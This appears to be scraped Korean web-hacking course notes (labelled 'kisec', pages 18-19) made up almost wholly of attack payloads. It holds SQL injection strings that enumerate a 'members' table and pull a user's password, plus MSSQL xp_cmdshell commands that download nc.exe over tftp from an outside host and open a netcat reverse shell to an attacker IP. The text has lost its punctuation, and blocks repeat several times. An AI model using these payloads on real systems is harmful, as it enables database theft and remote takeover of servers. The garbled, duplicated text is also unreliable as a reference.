$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

์šฐ๋ฆฌ๋Š” members ๋ผ๋Š” ํ…Œ์ด๋ธ”์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ์„ ๋ณผ์ˆ˜ ์žˆ์„ ๊ฒƒ์ด๋‹ค

$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --

Members์— ๋Œ€ํ•š ์ปฌ๋Ÿผ์„ ํ† ํ•ด๋‚ธ๋‹ค

$ or 1=(select top 1 user_id from members)--

User id์˜ ์ปฌ๋Ÿผ์— top 1 ์ธ๊ฒƒ์„ ํ† ํ•ด๋‚ธ๋‹ค

union select 1234 user_idpasswd from members where user_id=oyes --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 18

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19

์œผ์•„~password ๊ฐ€ oyesmall ์ด๋ผ๋„ค ์‹ค์Šต ๋

File Uploading

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --

$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --

์•„์ฃผ ๊ฐ„๋‹จํ•˜๋‹ค

$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --

kisec ์›นํ•ดํ‚น ๋…ธํŠธํ•„๊ธฐ ํŽ˜์ด์ง€ 19